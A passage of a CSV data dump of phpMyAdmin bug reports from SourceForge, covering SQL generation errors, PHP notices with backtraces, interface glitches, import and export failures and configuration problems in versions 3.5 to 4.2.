PMA 4.1.12 Apache 2.2.22 Win32) mod ssl 2.2.22 OpenSSL 1.0.1c PHP 5.4.24 Windows XP SP3 x32 Browser Firefox v28 I try to add column to table in tbl structure interface Form name dou type double length 15,2 default 0.00 instead ALTER TABLE `table1` ADD `dou` DOUBLE 15,2) NOT NULL DEFAULT 0.00 run sql ALTER TABLE `table1` ADD `dou` DOUBLE NOT NULL DEFAULT 0.00 without 15,2) Original URL https sourceforge.net p phpmyadmin bugs 4355 Original author verbum Found in version 4.1.12","bug"
"24444","10488","Missing refresh by deleting databases.
Hello guys, if I delete more than 100 databases I must refresh the list after deleting manually.
I have attached screenshots.
I hope you understand that.
Thanks you in advance!
Original URL https sourceforge.net p phpmyadmin bugs 4108 Original author dennis1993 Found in version 4.0.8 Attachment http sourceforge.net p phpmyadmin bugs 4108 attachment del db 01.jpg Attachment http sourceforge.net p phpmyadmin bugs 4108 attachment del db 03.jpg Attachment http sourceforge.net p phpmyadmin bugs 4108 attachment del db 02.jpg","bug"
"24444","10489","Drizzle tables in navigation are shown as views.
Original URL https sourceforge.net p phpmyadmin bugs 4109 Original author madhuracj Found in version 4.0.0","bug"
"24444","10490","shown table not updated after manual sql queries.
If you use the sql field with the button inline and issue an update query, the query is executed, but the table shown below is not updated, as it was in 3.x releases.
Original URL https sourceforge.net p phpmyadmin bugs 4358 Original author mokraemer Found in version 4.1.8","bug"
"24444","10491","Totals for database statistics is always zero.
Go to databases page and enable statistics.
Total values are always zero.
Original URL https sourceforge.net p phpmyadmin bugs 4110 Original author madhuracj Found in version Latest Git","bug"
"24444","10492","Notices on create table page.
These notices are displayed on table creation page Notice in .
libraries tbl columns definition form.inc.php 147 Undefined variable available mime Backtrace .
tbl create.php 92 require .
libraries tbl columns definition form.inc.php) Notice in .
libraries tbl columns definition form.inc.php 149 Undefined variable mime map Backtrace .
tbl create.php 92 require .
libraries tbl columns definition form.inc.php) Original URL https sourceforge.net p phpmyadmin bugs 4359 Original author azurit Found in version 4.1.12","bug"
"24444","10493","Incorrect quote escaping.
As can be seen with phpMyAdmin 4.2.0 alpha1 under PHP 5.3.28, there are a number of places where incorrect quote escaping occurs.
For example, typing SELECT bug in a SQL box tries to execute select \ bug\ .
Git bisect tells me that this bug was introduced with https github.com phpmyadmin phpmyadmin pull 943.
Original URL https sourceforge.net p phpmyadmin bugs 4360 Original author lem9 Found in version 4.2.0","bug"
"24444","10494","Click on table name link cause to callapse navigation tree.
Reproduce Steps 1.
Click on expand icon ) for any database 2.
Click on any table name Expected results Navigation tree should not change, while browse table page display Actual results Navigation tree collapse, while browse table page display Original URL https sourceforge.net p phpmyadmin bugs 4111 Original author chanaka777 Found in version 4.0.7","bug"
"24444","10495","PHPMyAdmin mysql dump.
I have found something need to be clear inside every mysql dump I create using export function.
If can please check on code responsible for this action, and clear something on bottom of file.
This something always tiggering error read or something on importing sql file Original URL https sourceforge.net p phpmyadmin bugs 4112 Original author suryatanamas Found in version 4.0.7","bug"
"24444","10496","No params checking in error report.php.
The error report.php blindly tries to use expected parameters without checking that they are present leading to many PHP errors.
Original URL https sourceforge.net p phpmyadmin bugs 4114 Original author nijel Found in version Latest Git","bug"
"24444","10497","PHP errors when grid editing a query.
What I did used grid editing on record in pma history table inline edit that query to change ID Following errors happen Warning in .
libraries dbi DBIMysqli.class.php 617 mysqli fetch fields ) expects parameter 1 to be mysqli result, boolean given Backtrace .
libraries dbi DBIMysqli.class.php 617 mysqli fetch fields boolean true) .
libraries DatabaseInterface.class.php 2357 PMA DBI Mysqli >getFieldsMeta boolean true) .
libraries sql.lib.php 2027 PMA DatabaseInterface >getFieldsMeta boolean true) .
libraries sql.lib.php 2220 PMA sendQueryResponseForResultsReturned boolean true, boolean false, array, string pma , string pma history , NULL, NULL, NULL, object, string tbl structure.php , string .
themes pmahomme img , string , integer 1, integer 1, string UPDATE `pma`.`pma history` SET `sqlquery` = \ SELECT FROM `bazeee bbb` \ WHERE `pma history`.`id` = 62 , NULL, NULL, NULL, NULL, NULL, string UPDATE `pma`.`pma history` SET `sqlquery` = \ SELECT FROM `bazeee bbb` \ WHERE `pma history`.`id` = 62 , NULL, ) .
libraries sql.lib.php 2314 PMA sendQueryResponse integer 1, integer 1, boolean false, string pma , string pma history , NULL, array, object, NULL, boolean true, boolean false, NULL, NULL, NULL, string tbl structure.php , string .
themes pmahomme img , string , string UPDATE `pma`.`pma history` SET `sqlquery` = \ SELECT FROM `bazeee bbb` \ WHERE `pma history`.`id` = 62 , NULL, NULL, NULL, NULL, NULL, string UPDATE `pma`.`pma history` SET `sqlquery` = \ SELECT FROM `bazeee bbb` \ WHERE `pma history`.`id` = 62 , NULL, ) .
import.php 616 PMA executeQueryAndSendQueryResponse array, boolean false, string pma , string pma history , NULL, NULL, NULL, boolean false, NULL, NULL, NULL, NULL, string tbl structure.php , string .
themes pmahomme img , NULL, NULL, NULL, string UPDATE `pma`.`pma history` SET `sqlquery` = \ SELECT FROM `bazeee bbb` \ WHERE `pma history`.`id` = 62 , NULL, NULL, ) Warning in .
libraries sql.lib.php 313 Invalid argument supplied for foreach ) Backtrace .
libraries sql.lib.php 2051 PMA resultSetContainsUniqueKey string pma , string pma history , boolean false, ) .
libraries sql.lib.php 2220 PMA sendQueryResponseForResultsReturned boolean true, boolean false, array, string pma , string pma history , NULL, NULL, NULL, object, string tbl structure.php , string .
themes pmahomme img , string , integer 1, integer 1, string UPDATE `pma`.`pma history` SET `sqlquery` = \ SELECT FROM `bazeee bbb` \ WHERE `pma history`.`id` = 62 , NULL, NULL, NULL, NULL, NULL, string UPDATE `pma`.`pma history` SET `sqlquery` = \ SELECT FROM `bazeee bbb` \ WHERE `pma history`.`id` = 62 , NULL, ) .
libraries sql.lib.php 2314 PMA sendQueryResponse integer 1, integer 1, boolean false, string pma , string pma history , NULL, array, object, NULL, boolean true, boolean false, NULL, NULL, NULL, string tbl structure.php , string .
themes pmahomme img , string , string UPDATE `pma`.`pma history` SET `sqlquery` = \ SELECT FROM `bazeee bbb` \ WHERE `pma history`.`id` = 62 , NULL, NULL, NULL, NULL, NULL, string UPDATE `pma`.`pma history` SET `sqlquery` = \ SELECT FROM `bazeee bbb` \ WHERE `pma history`.`id` = 62 , NULL, ) .
import.php 616 PMA executeQueryAndSendQueryResponse array, boolean false, string pma , string pma history , NULL, NULL, NULL, boolean false, NULL, NULL, NULL, NULL, string tbl structure.php , string .
themes pmahomme img , NULL, NULL, NULL, string UPDATE `pma`.`pma history` SET `sqlquery` = \ SELECT FROM `bazeee bbb` \ WHERE `pma history`.`id` = 62 , NULL, NULL, ) Original URL https sourceforge.net p phpmyadmin bugs 4115 Original author nijel Found in version Latest Git","bug"
"24444","10498","Blank results browser in some cases.
This might have same cause as 4115, but reporting it separately just to be sure Warning in .
libraries sql.lib.php 313 Invalid argument supplied for foreach ) Backtrace .
libraries sql.lib.php 2051 PMA resultSetContainsUniqueKey string pma , string pma history , boolean false, ) .
libraries sql.lib.php 2220 PMA sendQueryResponseForResultsReturned boolean true, boolean false, array, string pma , string pma history , NULL, NULL, NULL, object, string tbl structure.php , string .
themes pmahomme img , string , integer 1, integer 1, string UPDATE `pma`.`pma history` SET `sqlquery` = \ SELECT FROM `bazeee bbb` \ WHERE `pma history`.`id` = 62 , NULL, NULL, NULL, NULL, NULL, string UPDATE `pma`.`pma history` SET `sqlquery` = \ SELECT FROM `bazeee bbb` \ WHERE `pma history`.`id` = 62 , NULL, ) .
libraries sql.lib.php 2314 PMA sendQueryResponse integer 1, integer 1, boolean false, string pma , string pma history , NULL, array, object, NULL, boolean true, boolean false, NULL, NULL, NULL, string tbl structure.php , string .
themes pmahomme img , string , string UPDATE `pma`.`pma history` SET `sqlquery` = \ SELECT FROM `bazeee bbb` \ WHERE `pma history`.`id` = 62 , NULL, NULL, NULL, NULL, NULL, string UPDATE `pma`.`pma history` SET `sqlquery` = \ SELECT FROM `bazeee bbb` \ WHERE `pma history`.`id` = 62 , NULL, ) .
import.php 616 PMA executeQueryAndSendQueryResponse array, boolean false, string pma , string pma history , NULL, NULL, NULL, boolean false, NULL, NULL, NULL, NULL, string tbl structure.php , string .
themes pmahomme img , NULL, NULL, NULL, string UPDATE `pma`.`pma history` SET `sqlquery` = \ SELECT FROM `bazeee bbb` \ WHERE `pma history`.`id` = 62 , NULL, NULL, ) Original URL https sourceforge.net p phpmyadmin bugs 4116 Original author nijel Found in version Latest Git","bug"
"24444","10499","Error reporting fails on first loaded page.
The reason is that pages cache is not holding previous page so far AJAX.cache.pages[AJAX.cache.current 1] is undefined Original URL https sourceforge.net p phpmyadmin bugs 4117 Original author nijel Found in version Latest Git","bug"
"24444","10500","Error reporting component does not report.
The function which seems to do the reporting itself PMA sendErrorReport) is not called anywhere.
Original URL https sourceforge.net p phpmyadmin bugs 4118 Original author nijel Found in version Latest Git","bug"
"24444","10501","Huge session data with cfg[ Error Handler ][ gather ].
With cfg[ Error Handler ][ gather ] the session data can get really huge with no real benefit to the user.
The problem is that we store full backtrace with all objects passed as parameters.
This means that there are several PMA Response objects holding whole pages in the session data.
IMHO we should preprocess the backtrace with logic we currently apply getBacktraceDisplay, so that only information we use is stored in the session.
Original URL https sourceforge.net p phpmyadmin bugs 4119 Original author nijel Found in version Latest Git","bug"
"24444","10502","Print view does not work.
Was correct in 4.0.x.
Original URL https sourceforge.net p phpmyadmin bugs 4121 Original author lem9 Found in version Latest Git","bug"
"24444","10503","Cannot change server if clicked on the table first.
Steps to reproduce create config.inc.php with 2 servers.
use ajax login in the left column expand some table from localhost by clicking its name and not a sign http codeone.pl ss ss 2013 10 04 14 50 34 001.png) try to change to another server http codeone.pl ss ss 2013 10 04 14 51 29 001.png You will get javascript error as such >Uncaught TypeError Cannot set property innerText of null lastpass f.submit v.event.trigger get scripts.js.php?scripts[]=jquery jquery 1.8.3.min.js scripts[]=ajax.js s []=codemirror lib codemirror.js scripts[]=codemirror mode mysql mysql.js 2 anonymous function) get scripts.js.php?scripts[]=jquery jquery 1.8.3.min.js scripts[]=ajax.js s []=codemirror lib codemirror.js scripts[]=codemirror mode mysql mysql.js 2 v.extend.each get scripts.js.php?scripts[]=jquery jquery 1.8.3.min.js scripts[]=ajax.js s []=codemirror lib codemirror.js scripts[]=codemirror mode mysql mysql.js 2 v.fn.v.each get scripts.js.php?scripts[]=jquery jquery 1.8.3.min.js scripts[]=ajax.js s []=codemirror lib codemirror.js scripts[]=codemirror mode mysql mysql.js 2 v.fn.extend.trigger get scripts.js.php?scripts[]=jquery jquery 1.8.3.min.js scripts[]=ajax.js s []=codemirror lib codemirror.js scripts[]=codemirror mode mysql mysql.js 2 v.fn.
anonymous function) get scripts.js.php?scripts[]=jquery jquery 1.8.3.min.js scripts[]=ajax.js s []=codemirror lib codemirror.js scripts[]=codemirror mode mysql mysql.js 2 anonymous function) get scripts.js.php?scripts[]=jquery jquery 1.8.3.min.js scripts[]=ajax.js s codemirror lib codemirror.js scripts[]=codemirror mode mysql mysql.js 8596 v.event.dispatch get scripts.js.php?scripts[]=jquery jquery 1.8.3.min.js scripts[]=ajax.js s []=codemirror lib codemirror.js scripts[]=codemirror mode mysql mysql.js 2 event.dispatch get scripts.js.php?scripts[]=jquery jquery 1.8.3.min.js scripts[]=ajax.js s codemirror lib codemirror.js scripts[]=codemirror mode mysql mysql.js 1551 o.handle.u get scripts.js.php?scripts[]=jquery jquery 1.8.3.min.js scripts[]=ajax.js s []=codemirror lib codemirror.js scripts[]=codemirror mode mysql mysql.js 2 Original URL https sourceforge.net p phpmyadmin bugs 4122 Original author fliespl Found in version 4.0.8","bug"
"24444","10504","Double config including.
phpMyAdmin includes config file twice on prefs manage.php, and since on my ubuntu config file contains function declaration, it fails with cannot redeclare function silently.
It was very hard to find bug because phpmyadmin disables error reporting before evaling config file, and then re enables it.
Original URL https sourceforge.net p phpmyadmin bugs 4123 Original author axceed Found in version 3.5.8","bug"
"24444","10505","Can t SELECT Foreign Key, value only INSERTS and exists in Print View .
I have a weird problem.
I m new to mySQL, and I have a pretty simple database setup running phpmmyadmin thru MAMP).
I ve attached the sql script for my database and the phpmyadmin Data Dictionary, as well as an array of screenshots that highlights the problem area.
I have a foreign key that is present in all of the tables.
It is active and keyed in each one, and inputing data thru php queries works fine.
The problem comes in querying for existing data thru the main foreign key employee id) in the table labeled RATINGS.
When I go to view it within the phpmyadmin GUI, the field is empty.
If i try to manually input the data field, it won t work, even tho it will give me a dropdown of all existing employee id s from the Employee table.
When I try to target it with PHP, it doesn t see that it exists and returns NULL.
Now, when i look at the problem table in Print View, I can see that the value is there, showing as it does in all other tables in Print View.
But it s not queryable, and it only seems visible in the Print View mode, nowhere else.
I am at a lose, i spent a good amount of time researching for someone else with the same problem, but no luck.
Will greatly appreciate any help from anyone on here.
success baby fistbump First dev forum question.
That ll be Mr.
Web Developer to you from now on.
Original URL https sourceforge.net p phpmyadmin bugs 4373 Original author seavor Found in version 4.1.9 Attachment http sourceforge.net p phpmyadmin bugs 4373 attachment data dictionary.pdf Attachment http sourceforge.net p phpmyadmin bugs 4373 attachment launch.sql Attachment http sourceforge.net p phpmyadmin bugs 4373 attachment screenshots.png","bug"
"24444","10506","Editing a query from SQL History shows a blank page.
I meant to report this months ago as it s been in the whole 4.0. line I think.
Still present in the latest 4.0.8 from git).
Steps 1.
Click a table name to browse it.
2.
Click Edit on the SQL query box i.e.
next to Inline, Explain SQL etc) 3.
In the popup window, click the SQL History tab.
4.
Click the edit icon next to a query.
Expected A page like the SQL tab to appear with the appropriate query in the textarea.
Actual Basically a blank page.
There is just one checkbox with the label Do not overwrite this query from outside the window and nothing else.
Original URL https sourceforge.net p phpmyadmin bugs 4124 Original author svivian Found in version 4.0.8","bug"
"24444","10507","operation copy table uses removed parameter TYPE .
an SQL error is shown while sending CREATE TABLE... ) TYPE=... MySQL Verion is 5.5.28 cite from SQL documentation Section 5.1.7, xe2x80x9cServer SQL Modesxe2x80x9d.
Note The older TYPE option was synonymous with ENGINE.
TYPE was deprecated in MySQL 4.0 and removed in MySQL 5.5.
When upgrading to MySQL 5.5 or later, you must convert existing applications that rely on TYPE to use ENGINE instead.
Original URL https sourceforge.net p phpmyadmin bugs 4125 Original author maxi4711 Found in version 4.0.7","bug"
"24444","10508","importing large database, then this error... We were importing a large database and we got this error.
Can you decipher?
We got no info on the real line number or data table!
Thanks in advance BEGIN CUT eNo1zbEKwjAYBGCh2 8U9wAxNKlByBZKqEKaxKRWcBWHQskm6NubCt54fNzZlELS6AV6CWe9hoCE EJSnWjdE4ydfnIbiindy 1hXuuaEkBnMYP3EMNsKb0vBGO5n50ylLcXRaBx4yxXFU9wMC3lb6bg4 wi3l9SZn KDxLPQ7oGb3zxcWUiEE END CUT BEGIN RAW ERROR C1 C2 LEN 1 2 11 STR MySQL 5.5.32 cll USR OS, AGENT, VER Win MOZILLA 5.0 PMA 4.0.5 PHP VER,OS 5.3.17 Linux LANG en SQL END RAW SQL query MySQL said 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near at line 1 Original URL https sourceforge.net p phpmyadmin bugs 4126 Original author sitecats Found in version 4.0.5","bug"
"24444","10509","information schema cfg[ Servers ].
Hello, I use phpMyAdmin 4.0.5 In according to phpmyadmin documentation there is following directive that does NOT work config option cfg[ Servers ][ i][ ShowDatabasesCommand ] type string default `` SHOW DATABASES `` On a server with a huge number of databases, the default ``SHOW DATABASES`` command used to fetch the name of available databases will probably be too slow, so it can be replaced by faster commands.
You can use `` user `` string will be replaced by current user.
When using ``false``, it will disable fetching databases from the server, only databases in config option ` cfg[ Servers ][ i][ only db ]` will be displayed.
Examples `` SHOW DATABASES `` `` SHOW DATABASES LIKE user `` `` SELECT DISTINCT TABLE SCHEMA FROM information schema.SCHEMA PRIVILEGES `` `` SELECT SCHEMA NAME FROM information schema.SCHEMATA `` ``false`` If i set this directive with `` SHOW DATABASES LIKE user `` or ``false`` in usr local cpanel base 3rdparty phpMyAdmin config.inc.php it just be ignored as you can see on mysql log Time 131009 22 51 35 User Host [ ] s [10.0.1.12] Query time 8.129845 Lock time 0.000094 Rows sent 2 Rows examined 5 SET timestamp=1381351895; SELECT `SCHEMA NAME` FROM `INFORMATION SCHEMA`.`SCHEMATA` WHERE TRUE AND `SCHEMA NAME` NOT REGEXP information schema ORDER BY `SCHEMA NAME` ASC LIMIT 0, 25; Time 131009 22 51 43 User Host [ ] [10.0.1.12] Query time 7.905233 Lock time 0.000115 Rows sent 3 Rows examined 3 SET timestamp=1381351903; SHOW DATABASES; Time 131009 22 51 51 User Host [ ] [10.0.1.12] Query time 7.927969 Lock time 0.000143 Rows sent 3 Rows examined 3 SET timestamp=1381351911; SHOW DATABASES; Have a solution?
Original URL https sourceforge.net p phpmyadmin bugs 4127 Original author clubbu Found in version 4.0.5","bug"
"24444","10510","1100 Table pma column info was not locked with LOCK TABLES.
hai,i am importing sql file to php myadmin dsiplay this error 1100 Table pma column info was not locked with LOCK TABLES Error SQL query DocumentationEdit Edit SELECT `comment` FROM `phpmyadmin`.`pma column info` WHERE db name = magen AND table name = AND column name = db comment) MySQL said Documentation 1100 Table pma column info was not locked with LOCK TABLES Original URL https sourceforge.net p phpmyadmin bugs 4128 Original author venki58 Found in version 3.5.7","bug"
"24444","10511","Unneeded navi panel refresh.
When browsing a table and moving from page to page, the navi panel redisplays on which table I am looks as if I just switched to this table) but I am still on the same table and this animation is distracting.
Original URL https sourceforge.net p phpmyadmin bugs 4129 Original author lem9 Found in version Latest Git","bug"
"24444","10512","Import number of rows to skip is ambiguous.
I import a big file, about 214MB in size, and I set number of rows to skip to 175751, which is around 16 of the file.
The import finishes pretty quickly, and it executes 0 queries.
So I m guessing it s skipping much, much more than the number of lines that I m telling it to skip.
Is it perhaps interpreted as the number of queries to skip rather than lines?
If so, that s wrong.
Or is it because the number is too big?
In any case, it s not working correctly.
Original URL https sourceforge.net p phpmyadmin bugs 4131 Original author sistisette Found in version 4.1.2","bug"
"24444","10513","CSV import breaks when no blank line at end of file.
If you import a CSV that does not end with a trailing new line, it comes back with an error Invalid format of CSV input on line 25.
And the last line of the CSV is not imported.
This is a basic CSV as exported from Google Docs.
Original URL https sourceforge.net p phpmyadmin bugs 4133 Original author svivian Found in version 4.0.8","bug"
"24444","10514","After deleting all rows on a page, it returns to a blank page.
To reproduce 1.
Have a table that spans several pages in Browse mode.
2.
Go to the last page.
3.
Click Check all then delete those rows.
It then goes to a blank table.
At the top it says Your SQL query has been executed successfully with the delete query below.
Then below that it says Showing rows 720 719 720 total, Query took 0.0014 sec) Then the query box `SELECT FROM `table` LIMIT 720 , 30` the table now had 720 rows after deletion).
Then the table headers but no rows of the table.
I would expect it to either go to the previous page which is now the last page of the table), or maybe the first page.
At least it should show some data.
Original URL https sourceforge.net p phpmyadmin bugs 4134 Original author svivian Found in version 4.0.8","bug"
"24444","10515","Missing source for OpenLayers library.
The source code for minified OpenLayers library are missing.
They should be shipped in similar way as we do for jQuery or we should stop distributing minified version of OpenLayers.
Original URL https sourceforge.net p phpmyadmin bugs 4382 Original author nijel Found in version 4.1.14","bug"
"24444","10516","Cannot update values in Zoom search.
In Zoom Search, it should be possible to update values by clicking on a dot, changing values and clicking on Save; but an incorrect UPDATE query is generated.
Original URL https sourceforge.net p phpmyadmin bugs 4383 Original author lem9 Found in version 4.2.0","bug"
"24444","10517","Grid edit on sorted columns fails.
When a table is sorted, and an attempt is made to edit a value in the column that is sorted, the query that is generated has the sort order number as part of the column name.
e.g.
for the `foo` column, it s been sorted desc , and so gets an arrow and a sort order number 1 in the column header.
When I try to edit a value in that column, the query that gets created is thus UPDATE `db`.`table` SET `foo 1` = 0 WHERE `table`.`id` = 1 Note the space in the column name of the SET clause.
This obviously throws an error and is not what s expected.
Original URL https sourceforge.net p phpmyadmin bugs 4385 Original author benjamwelker Found in version 4.2.0","bug"
"24444","10518","When searching, error No database selected .
How to reproduce Select a table, go to the Search tab and search something Result Under the search form this error message is displayed > Error > >SQL query Documentation > >SELECT FROM `jeux video` WHERE `ID` = 1 > LIMIT 0, 25 > >MySQL said > 1046 No database selected Original URL https sourceforge.net p phpmyadmin bugs 4135 Original author rm km it Found in version Latest Git","bug"
"24444","10519","Error on searching.
While using table search, I get following PHP error Notice in .
libraries sql.lib.php 2135 Undefined index Bookmark Backtrace .
libraries sql.lib.php 2219 PMA sendQueryResponseForResultsReturned object, boolean true, array, string weblate , string accounts verifiedemail , NULL, NULL, NULL, object, string , string .
themes pmahomme img , string LIMIT 0, 25 , string 4 , integer 4, string SELECT FROM `accounts verifiedemail` LIMIT 0, 25 , NULL, NULL, NULL, NULL, NULL, string SELECT FROM `accounts verifiedemail` , NULL, ) .
libraries sql.lib.php 2332 PMA sendQueryResponse integer 1, string 1 , boolean false, string weblate , string accounts verifiedemail , NULL, array, object, NULL, object, boolean false, NULL, NULL, NULL, string , string .
themes pmahomme img , string LIMIT 0, 25 , string SELECT FROM `accounts verifiedemail` WHERE `id` = 2 LIMIT 0, 25 , NULL, NULL, NULL, NULL, NULL, string SELECT FROM `accounts verifiedemail` WHERE `id` = 2 , NULL, ) .
tbl select.php 69 PMA executeQueryAndSendQueryResponse array, boolean false, string weblate , string accounts verifiedemail , NULL, NULL, NULL, boolean false, NULL, NULL, NULL, NULL, string , string .
themes pmahomme img , NULL, NULL, NULL, string SELECT FROM `accounts verifiedemail` WHERE `id` = 2 , NULL, NULL, ) Original URL https sourceforge.net p phpmyadmin bugs 4136 Original author nijel Found in version Latest Git","bug"
"24444","10520","Error report not submitted even when messages says otherwise.
The error report is not submitted even when the messages says otherwise.
This happens when server does not have CURL extension installed.
Original URL https sourceforge.net p phpmyadmin bugs 4137 Original author nijel Found in version Latest Git","bug"
"24444","10521","Bookmark query from SQL tab does not work.
You enter a name in the Bookmark this SQL query input, but after returning it ist not in the dropdown nor in pma bookmark Original URL https sourceforge.net p phpmyadmin bugs 4138 Original author rm km it Found in version Latest Git","bug"
"24444","10522","Null checkbox covering data input when editing.
Inline data editing when Null is allowed causes that input label on 14th column and higher is covered by Null checkbox and I cannot see, what I m typing [[img src=phpmyadminerror.png alt=foobar]] Original URL https sourceforge.net p phpmyadmin bugs 4389 Original author lucius silencio Found in version 4.2.0 Attachment http sourceforge.net p phpmyadmin bugs 4389 attachment phpmyadminerror.png","bug"
"24444","10523","reCAPTCHA causing CSP problems.
recaptcha ssl problem http poiuty.ru img dc77c77330b1bc5ae824282905a9.png Original URL https sourceforge.net p phpmyadmin bugs 4139 Original author poiuty Found in version 4.1.0","bug"
"24444","10524","Bug in privileges for routines.
There seems to be a display bug concerning privileges for stored procedure routines).
See screenshot in attachment which gives a notice that I don t have privileges to add routines.
Above the notice you also see I can t edit or drop the test routine.
But when I just run the queries to do exactly the same there is no issue at all.
So I do have the necessary rights.
More when I use the navigation tree on the left and use the link new below procedures I actually can ad a procedure...
So their seems to be a bug in the routine landing page...
Original URL https sourceforge.net p phpmyadmin bugs 4140 Original author kevin vds Found in version 4.0.8 Attachment http sourceforge.net p phpmyadmin bugs 4140 attachment 2013 10 21 2002.45.21 20pm.png","bug"
"24444","10525","Permission to all users ignored by currentUserHasPrivilege ).
We have added the TRIGGER privilieges to all user for a database but the trigger tab still don t appear and going directly to its url redirect back to the default tab) it appears to be a bug in currentUserHasPrivilege ) the function return true only when GRANTEE match CURRENT USER ) but it should return true for domain if CURRENT USER ) is user domain Original URL https sourceforge.net p phpmyadmin bugs 4142 Original author mathroc Found in version 4.0.8","bug"
"24444","10526","Export fails, generates 0 byte file without an error message.
I m trying to export a database by first selecting it and then going to the Export tab.
I ve exported dozens of databases literally thousands of times before, from several servers with different phpmyadmin versions and it s the first time I face this problem, but with this particular database it s 100 systematic.
When I choose quick and click go , download finishes immediately I must admit it is quick), and the downloaded file is 0 zero) bytes in size.
I guess the problem is probably related to the fact that the amount of data in the database is relatively big.
There is a table with more than 65k records.
However that shouldn t be a problem at all if it is, a sensible error message should be given, saying Database too big and giving suggestions about how to export it you may want to try [...whatever...] instead .
What is unacceptable is that you get an apparently succesful download of a 0 byte file without an error message.
Original URL https sourceforge.net p phpmyadmin bugs 4143 Original author sistisette Found in version 4.0.4 Attachment http sourceforge.net p phpmyadmin bugs 4143 attachment Screenshot 20from 202013 10 22 2016 3A57 3A04.png","bug"
"24444","10527","DROP DATABASE displays wrong database name.
Create database test Operations > Copy database to test2 click Drop the database .
It will show a popup ... really want to execute DROP DATABASE test2 ?
click OK database test has been dropped while test2 still exists Original URL https sourceforge.net p phpmyadmin bugs 4144 Original author spider 007 Found in version 4.0.8","bug"
"24444","10528","Config screen fails to validate MemoryLimit = 1 new default).
The `MemoryLimit` setting changed to ` 1` for unlimited, but the config screen fails to validate it.
Reason The regex in `config.values.php` does not cover this case.
Original URL https sourceforge.net p phpmyadmin bugs 4145 Original author mynetx Found in version 4.1.0 Attachment http sourceforge.net p phpmyadmin bugs 4145 attachment Screenshot 202013 10 27 2020.19.13.png","bug"
"24444","10529","Can t resize or move dialogs.
To reproduce inject a js error into a page visit that page in the error notification, click show report details try to move or resize the dialog that pops up it s now impossible to exit the moving or resizing mode, the only way out is to press the Esc key and lose the error information 64 bit Linux Chrome 27 Original URL https sourceforge.net p phpmyadmin bugs 4146 Original author roccivic Found in version Latest Git","bug"
"24444","10530","Monitor should fit into screen width.
In past probably when there were frames), the monitor did just fill the width of main frame and did not need horizontal scrolling.
These days it looks like there are always three charts in a row regardless the screen width.
Original URL https sourceforge.net p phpmyadmin bugs 4398 Original author nijel Found in version Latest Git","bug"
"24444","10531","Accessibility Images, namely theme dot, without Alt nor title attribute.
I m writing about this because my hosting provider has updated PhpMyAdmin to 4.0.5 only recently.
In PhpMyAdmin 4.0 including last development version available as a demo), a bunch of actions are labeled with an image called theme dot .
this makes PhpMyAdmin s accessibility for blind developers strongly lower.
We, as screen reader users, can determine what this or that image does only by its Alt or Title attribute.
Please bring this back somehow.
PhpMyAdmin has always been a really accessible solution, and this small?)
change brought its accessibility down.
Thanks!
Original URL https sourceforge.net p phpmyadmin bugs 4147 Original author oire Found in version 4.0.5","bug"
"24444","10532","Users table cells misplaced after adding a new user.
When I add a new user then the initially loaded user list is faulty screenshot attached).
After refreshing the table is fine.
Original URL https sourceforge.net p phpmyadmin bugs 4148 Original author m0dul0 Found in version Latest Git Attachment http sourceforge.net p phpmyadmin bugs 4148 attachment user list error.png","bug"
"24444","10533","Js freezes in the management of replication.. Click Replication tab.
Click Control slave .
Click Full stop or Full start or some other links.
Original URL https sourceforge.net p phpmyadmin bugs 4149 Original author gemorroj Found in version 4.0.8 Attachment http sourceforge.net p phpmyadmin bugs 4149 attachment repl.png","bug"
"24444","10534","Clicking database name in query window opens a new tab.
Clicking the link Run SQL query queries on database test opens a new window instead of opening it inside the parent window.
Steps Open the query window by clicking the Edit link of the SQL query.
Click on the name of database.
A new window is opened.
Original URL https sourceforge.net p phpmyadmin bugs 4150 Original author omerjerk Found in version 4.0.9","bug"
"24444","10535","Disable Ajax not working in version 4.0.5.
I ve tried to disable ajax on phpMyAdmin config and no any effect result.
I ve edited config.inc.php to include the following line cfg[ AjaxEnable ] = false; But Ajax still working when access phpmyadmin .
My server OS Centos 6 , and control panel cPanel WHM .
Installed phpmyadmin version 4.0.5 .
Original URL https sourceforge.net p phpmyadmin bugs 4151 Original author samehdim Found in version 4.0.5","bug"
"24444","10536","Unable to browse foreign values .
When tried to browse foreign value it threw this error { exception { mode stack , name TypeError , message event is undefined , stack [ { func AJAX.requestHandler , args , line 194, column 12 , context [ if AJAX.alteredTargets[i].value.length != 0) { , isInputAltered = true; , break; , } , }; , if event.type === click isInputAltered confirm PMA message ... , return false; , } , reset , AJAX.alteredTargets.length = 0; , ], filename ajax.js }, { func PMA makegrid g.initGridEdit Steps to reproduce 1) Browse a table that has foreign value.
2) Click on foreign value.
Original URL https sourceforge.net p phpmyadmin bugs 4403 Original author chirayu45 Found in version Latest Git","bug"
"24444","10537","Not possible to enter for search in date fields.
I consider this a bug, beacause it is OK in MySQL to do a LIKE on a date with the wildcard, so why should it not be possible with phpMyAdmin?
Original URL https sourceforge.net p phpmyadmin bugs 4152 Original author rm km it Found in version Latest Git","bug"
"24444","10538","Recordset return from procedure display nothing.
when execute a procedure via call proc name ) that returns recordset, display nothing!
Original URL https sourceforge.net p phpmyadmin bugs 4404 Original author pipiscrew Found in version 4.2.1","bug"
"24444","10539","Unable to import if newline encoding is MAC style.
Hi PMA coders, I m using following versions PMA 4.0.9 Database client version libmysql 5.5.31 Server MyDB xx.xx.xx.xx via TCP IP) Server type Percona Server Server version 5.1.71rel14.9 Percona Server with XtraDB GPL), Release rel14.9, Revision 589 Protocol version 10 Browser Opera 12.16 linux Desktop OS Ubuntu 12.04 Problem description Import of table dump in SQL format has not been successful as a newline format is MAC style.
Operation stucks or import is partial only.
After conversion to Linux newline format it works.
I ve attached the example of such SQL dump.
Original URL https sourceforge.net p phpmyadmin bugs 4153 Original author eqo sk Found in version 4.0.9 Attachment http sourceforge.net p phpmyadmin bugs 4153 attachment tl task.sql","bug"
"24444","10540","Internal Server Error.
Got error PHP message PHP Fatal error Call to a member function getPaths ) on a non object in usr share phpmyadmin libraries navigation NavigationTree.class.php on line 1158 Looks like this is due to the disabled table expansion.
Original URL https sourceforge.net p phpmyadmin bugs 4406 Original author mokraemer Found in version 4.2.1","bug"
"24444","10541","Error using UNION query.
On a table view, click a column to order by that column.
Then execute a UNION query with that table and another one with the ordered table coming second).
